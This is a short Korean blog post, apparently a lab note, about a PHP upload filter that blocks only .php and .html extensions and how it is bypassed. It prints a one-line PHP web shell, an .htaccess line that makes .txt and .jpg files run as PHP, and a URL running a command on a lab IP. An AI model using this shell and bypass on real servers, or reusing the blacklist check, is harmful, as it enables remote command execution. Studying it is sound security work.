php, html 확장자 파일 업로드 제한하기


====================================================================
<Directory "/usr/local/apache/htdocs/pds">
  Options FollowSymLinks MultiViews
  AllowOverride All
  :
  :
</Directory>


-- pdsok.php --
<?
    /*-- 파일 확장자 검사 --*/
  $fullname = explode(".", $_FILES[upload][name]);
  $ext =  $fullname[sizeof($fullname)-1];
  
  if($ext == "php" || $ext == "html") 
  {
     echo "<script language=JavaScript>
           <!--
             alert('올릴 수 없는 파일입니다');
             history.go(-1);
           -->
           </script>
          ";
     exit;   

  }
  /*-- 파일 확장자 검사 --*/
  :
  :
-- pdsok.php --

-- webshell.php --
<?
  system($_GET[cmd]);
?>
-- webshell.php --

webshell.php 파일이 업로드가 안된다.
.htaccess 

-- .htaccess --
AddType application/x-httpd-php .txt .jpg
-- .htaccess --
.htaccess 파일이 업로드 된다.

-- webshell.txt --        // txt파일로 업로드를 하지만 php코드가 실행된다.
<?
  system($_GET['cmd']);
?>
-- webshell.txt --

http://192.168.100.100/pds/webshell.txt?cmd=pwd

!!! 웹 공격
====================================================================

저작자표시 비영리 변경금지

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

HoyoungE

php, html 확장자 파일 업로드 제한하기

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

php, html 확장자 파일 업로드 제한하기

'전체' Related Articles

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역